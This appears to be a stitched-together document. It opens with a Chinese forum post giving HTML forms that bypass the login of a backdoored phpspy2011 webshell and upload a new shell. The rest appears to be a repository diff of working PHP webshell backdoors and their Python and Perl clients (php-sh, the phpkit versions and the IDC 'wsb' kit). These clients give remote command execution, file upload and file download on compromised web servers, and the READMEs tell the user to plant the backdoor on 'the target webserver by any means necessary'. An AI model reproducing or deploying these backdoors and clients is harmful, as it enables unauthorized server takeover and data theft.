官方目前下载已经修补上了 目前官方下载是2011.php 文件名为2011ok.php的是带洞版本。
鄙视转载不留版权的特别鄙视下那个什么hack情
http://hi.baidu.com/5427518 / http://www.hackqing.com/
我曾经还以为他是个人物。
今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看
发现2011有不少借鉴WSO Shell的地方看到$pass还是在那个函数的上面但是验证成功过后用了一个Location重定向了一下之后会再次检查一次cookies。
但是想不明白作者为什么这样做和2010的原理一样一样绕过
下面给出一个更为直接的利用方法上传你自己的新shell
<form method="POST" action="http://www.hackshell.net/2011ok11.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="login">
<input type="submit" value="Login"></form>
点击Login这步点登录后 是登录界面 继续操作下一步:
<form method="POST" action="http://www.hackshell.net/2011ok.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
然后访问:
<form action="http://www.hackshell.net/2011ok.php" method="POST" enctype="multipart/form-data">
<input name="password" type="password" size="20">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input name="uploadfile" value="" type="file">
<input name="doupfile" value="Upload" type="submit">
<input name="uploaddir" value="D:/workspace/" type="hidden">
<input name="dir" value="D:/workspace/" type="hidden">
</form>
其中把iploaddir的value改为phpinfo中看到的路径上传shell。

41
php/php-sh/client.py Normal file
View file

@ -0,0 +1,41 @@
#!/usr/bin/python
# Client for the backdoor which
# uses HTTP CODE header for inserting code
# Got the idea after seeing this sort of payload
# dropped by a phpmyadmin exploit on rdot :)
# Is also good to learn how to use urllib
# and not be lazy arse with requests all of time!
# Insecurety Research (2013) - insecurety.net
import urllib2
import sys
def usage(program):
print "HTTP CODE Header Backdoor Command Shell"
print "Usage: %s <Backdoor URL>" %(program)
print "Example: %s http://www.test.com/webshell.php" %(program)
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
print "[+] Using %s as target" %(args[1])
print "[!] Popping a shell, type 'exit' to quit"
while True:
opener = urllib2.build_opener()
url = args[1]
cmd = raw_input('~$ ')
if cmd == "exit":
sys.exit(0)
else:
code = "system('%s');" %(cmd)
opener.addheaders.append(('Code', code))# %(str(code))
urllib2.install_opener(opener)
result = urllib2.urlopen(url).read()
print result
except Exception, e:
print e
if __name__ == "__main__":
main(sys.argv)

3
php/php-sh/server.php Normal file
View file

@ -0,0 +1,3 @@
<?php
eval(getenv('HTTP_CODE'));
?>

53
php/phpkit-0.1a/README Normal file
View file

@ -0,0 +1,53 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-0.1a
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkit.py, simply
gives a "shell prompt" (non interactive, each command is executed
in a new "context") on the victim server. It is trivial to write
pretty much anything, I have also written "upload.py" which will
be ready for the next release, which allows uploading arbritary
files to the infected webserver.
USAGE:
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkit.py <url to php file on server> and enjoy!
Example Use:
[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
shell:~$
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

10
php/phpkit-0.1a/odd.php Normal file
View file

@ -0,0 +1,10 @@
// php://input based backdoor
// uses include('php://input') to execute arbritary code
// Any valid PHP code sent as raw POST data to backdoor is ran
// overrides the php.ini settings using ini_set :)
// Insecurety Research 2013 | insecurety.net
<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>

28
php/phpkit-0.1a/phpkit.py Normal file
View file

@ -0,0 +1,28 @@
#!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twitter: @info_dox
# Insecurety Research - 2013
import requests
import sys
if (len(sys.argv) != 2):
print "Usage: " + sys.argv[0] + " <url of backdoor>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
sys.exit(0)
url = sys.argv[1]
print "\n[+] URL in use: %s \n" %(url)
while True:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
payload = """<?php system('%s'); ?>""" %(cmd)
hax = requests.post(url, payload)
print hax.text

10
php/phpkit-0.2a/CHANGELOG Normal file
View file

@ -0,0 +1,10 @@
Changelog of phpkit development
--
0.1a - 07/01 (Jan)/2013 - Initial Commit
0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
Uses simple logic to choose the first one that works.
Needs code cleanup soon, and implementation of exec() :)
0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
Preparing for the 0.2a release by finishing the upload client and writing
documentation for it. Code is a lot cleaner now though. Still need to fix
the bloody "test" function :/

100
php/phpkit-0.2a/README Normal file
View file

@ -0,0 +1,100 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-0.2a
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkit.py, simply
gives a "shell prompt" (non interactive, each command is executed
in a new "context") on the victim server. It is trivial to write
pretty much anything.
This release includes a massively overhauled backdoor client, it
tests various execution functions against the victim host before
using whatever one works first. It is massively ugly code, but
I intend to clean it up soonish.
This release also includes a basic file uploader :)
USAGE (backdoor part):
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkit.py <url to php file on server> and enjoy!
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
[+] Testing system function
[+] system() function works
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
USAGE (file uploader part):
This assumes "odd.php" is loaded onto the victim webserver, obviously.
You run ./upload.py <url to odd.php> <file to upload> <remote path>
Only works if remote path is writeable. /tmp/ is always good :)
Example Use:
[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
[+] Uploading File
[+] Upload should be complete
So the file uploaded, now I compare MD5sums to check did it bloody well work!
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
2568416e280af88f82e982efd46525a8 /etc/passwd
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
2568416e280af88f82e982efd46525a8 /tmp/pass
Seems legit bro ;)
TODO:
MySQL client.
Notes:
In two use-cases this was shown to not function.
Use Case A: Servers with the Suhosin PHP Hardening Patches.
In this case, php://input and other URL inclusion vectors are rendered
unuseable due to the protections the Suhosin patches offer. i.e. this
tool don't work against Suhosin patched boxes.
Use Case B: Servers where php.ini is dictated by httpd.conf
In several cases where the php.ini is specific to the HTTP daemon,
runtime ini directive modification is not permissable. I have
personally observed this behaviour on Apache thus far, however
further testing/research is needed to find a workaround of some kind.
Please report if you have any issues getting this to work. Please
test it on a server with allow_url_include = On , then if it works,
set allow_url_include = Off , restart httpd, and check does it work.
If it does not work, please report using the issue tracker at
http://code.google.com/p/insecurety-research providing details of HTTPD
configuration so I can attempt to figure out new things :)
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

10
php/phpkit-0.2a/odd.php Normal file
View file

@ -0,0 +1,10 @@
// php://input based backdoor
// uses include('php://input') to execute arbritary code
// Any valid PHP code sent as raw POST data to backdoor is ran
// overrides the php.ini settings using ini_set :)
// Insecurety Research 2013 | insecurety.net
<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>

106
php/phpkit-0.2a/phpkit.py Normal file
View file

@ -0,0 +1,106 @@
#!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 2):
print "Usage: " + sys.argv[0] + " <url of backdoor>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
sys.exit(0)
url = sys.argv[1]
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
### ###
# End of functions and object oriented stuff #
### ###
# the main body
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)

34
php/phpkit-0.2a/upload.py Normal file
View file

@ -0,0 +1,34 @@
#!/usr/bin/python
# Upload.py
# File Upload client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 4):
print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
sys.exit(0)
url = sys.argv[1]
localfile = sys.argv[2]
remotefile = sys.argv[3]
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "a");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"

97
php/phpkit-1.0/README.txt Normal file
View file

@ -0,0 +1,97 @@
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
phpkit-1.0
Stealth PHP Backdooring Utility - Insecurety Research 2013
This is a simple kit to demonstrate a very effective way of
backdooring a webserver running PHP.
Essentially, it functions by parsing out any valid PHP code
from raw HTTP POST data sent to it, and executing said PHP.
No eval() or other suspect calls are in the serverside script,
the code is executed by the include() function. The php://input
data stream (which is basically "anything sent via raw POST) is
used to "capture" the raw POST data, and when parsed by include()
the code sent is executed.
This allows for many things to be done, i.e. executing any PHP
code you happen to write. The example client, phpkitcli.py, offers
file upload and a remote shell.
This release includes a massively overhauled backdoor client, it
tests various execution functions against the victim host before
using whatever one works first. It is massively ugly code, but
I intend to clean it up soonish.
USAGE (backdoor part):
You upload "odd.php" to the target webserver by any means necessary.
You then run ./phpkitcli.py --url <url to php file on server> and enjoy!
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
[+] URL in use: http://localhost/odd.php
[+] Testing system function
[+] system() function works
shell:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell:~$ uname -a
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
USAGE (file uploader part):
This assumes "odd.php" is loaded onto the victim webserver, obviously.
You run:
./phpkitcli.py --url <url to odd.php> --lfile <file to upload> --rfile <remote path> --mode UPLOAD
Only works if remote path is writeable. /tmp/ is always good :)
Example Use:
[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
[+] Uploading File
[+] Upload should be complete
So the file uploaded, now I compare MD5sums to check did it bloody well work!
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
2568416e280af88f82e982efd46525a8 /etc/passwd
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
2568416e280af88f82e982efd46525a8 /tmp/pass
Seems legit bro ;)
TODO:
MySQL client.
Notes:
In two use-cases this was shown to not function.
Use Case A: Servers with the Suhosin PHP Hardening Patches.
In this case, php://input and other URL inclusion vectors are rendered
unuseable due to the protections the Suhosin patches offer. i.e. this
tool don't work against Suhosin patched boxes.
Use Case B: Servers where php.ini is dictated by httpd.conf
In several cases where the php.ini is specific to the HTTP daemon,
runtime ini directive modification is not permissable. I have
personally observed this behaviour on Apache thus far, however
further testing/research is needed to find a workaround of some kind.
Please report if you have any issues getting this to work. Please
test it on a server with allow_url_include = On , then if it works,
set allow_url_include = Off , restart httpd, and check does it work.
If it does not work, please report using the issue tracker at
http://code.google.com/p/insecurety-research providing details of HTTPD
configuration so I can attempt to figure out new things :)
Questions, comments, bug reports and abuse? infodox () insecurety.net
Licence: The do whatever you want with it, just don't rip code without
giving credit licence.

5
php/phpkit-1.0/odd.php Normal file
View file

@ -0,0 +1,5 @@
<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>

132
php/phpkit-1.0/phpkitcli.py Normal file
View file

@ -0,0 +1,132 @@
#!/usr/bin/python
import argparse
import requests
import sys
help = """Connects to a phpkit backdoor and provides file upload or shell access"""
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--url", help="URL of backdoor", required=True)
parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
parser.add_argument("--lfile", help="File to Upload (full path)")
parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
args = parser.parse_args()
url = args.url
mode = args.mode
localfile = args.lfile
remotefile = args.rfile
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
###
def shell(func):
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
def upload(url, localfile, remotefile):
f = open(localfile, "r")
rawfiledata = f.read()
encodedfiledata = rawfiledata.encode('base64')
phppayload = """<?php
$f = fopen("%s", "a");
$x = base64_decode('%s');
fwrite($f, "$x");
fclose($f);
?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
print "[+] Uploading File"
requests.post(url, phppayload) # this is why I love the python requests library
print "[+] Upload should be complete"
sys.exit(0)
def main(url, localfile, remotefile, mode):
if mode == "UPLOAD":
upload(url, localfile, remotefile)
elif mode == "SHELL":
func = test(url, test, testkey)
shell(func)
else:
print "[-] Mode Invalid... Exit!"
sys.exit(0)
main(url, localfile, remotefile, mode)

7
php/wsb/ReadMe.txt Normal file
View file

@ -0,0 +1,7 @@
#Web Shell BackDoor
For using this tool you must follow this steps :
1- Upload the php Agent (idc.php) into server
2- Run the perl script (wsb.pl) on your machine
3- Give the address of the agent to the perl script
4- Using this username and password : user :root , pass : toor
5- Enter Your Commands;)

7
php/wsb/idc.php Normal file
View file

@ -0,0 +1,7 @@
<?php
$user="63a9f0ea7bb98050796b649e85481845"; #root
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
{eval($_GET['idc']);}
?>

109
php/wsb/wsb.pl Normal file
View file

@ -0,0 +1,109 @@
#IDC php BackDoor
#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO
#We Are M.R.S.CO,N3O,UB313,Black.Hack3r
#Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print q (
__ __ __
| | _|_ {_ |_ _|| |__} _ _| | \ _ _ _
|/\|{-|_} __}| }{-|| |__}{_|{_|{|__/{_}{_}|
--=[Web Shell BackDoor]
+---++---==[Version : 1.1]
+---++---==[Coded by : M.R.S.CO]
+---++---==[WwW.IDC-TeaM.Net]
--=[Iranian Dark Coders Team]
);
use LWP::Simple;
print "\nEnter Shell URL : ";
chomp($url=<STDIN>);
print "\nEnter UserName : ";
chomp($usr=<STDIN>);
print "Enter PassWord : ";
chomp($pass=<STDIN>);
print "\nStart analyze shell\n";
@fun=("system","passthru","exec","shell_exec");
$tf="false";
foreach(@fun)
{
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');";
if ($source =~ m/idc-team/i){
print "\nConected\nFor more information Enter \"help\"";
do {
print "\nWSB : ";
chomp($cmd=<STDIN>);
if ($cmd=~"help")
{
print q (
================================================================
command Description
------- --------------------------
help The help command display the help menu
getuid The 'getuid' command will display the user
lpwd display the filename of the current working directory
ps The 'ps' command display the list of running processes.
shell It display the standard shell
dir The 'dir' command List information about the FILEs
download The 'download' command downloads a file from the remote machine
sym The 'sym' command create a symlink
);
}elsif ($cmd=~"getuid"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');";
print "\nUser id = $source";
}elsif ($cmd=~"dir"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');";
print "\n $source";
}elsif ($cmd=~"lpwd"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');";
print "\n$source";
}elsif ($cmd=~"ps"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');";
print "\n$source";
}elsif ($cmd=~"exit"){
exit 0;
}elsif ($cmd=~"sym"){
print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : ";
chomp($target=<STDIN>);
print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : ";
chomp($sym=<STDIN>);
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');";
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');";
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');";
print "\nSymlink \"$sym\" Was Created;)\n";
}elsif ($cmd=~"download"){
print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : ";
chomp($ff=<STDIN>);
print "\nEnter Save Path : ";
chomp($fp=<STDIN>);
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');";
open (fdl, '>>'.$fp);
print fdl "$source";
close (fdl);
print "\File \"$ff\" Was Downloaded to $fp\n";
}elsif ($cmd=~"shell"){
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");";
print "\n$source";
do {
print "\ncmd : ";
chomp($cm=<STDIN>);
$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");";
print "\n$source";
if ($cm=~"exit"){goto ou;}
}while ($==1)
}else{
print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\"";
}
ou:;
}while ($==1)
}
$tf="true";
}
if($tf="true") {print "Cant connect to server !!\n";}

1522
php/wso2.5.1.php Normal file
View file

File diff suppressed because it is too large Load diff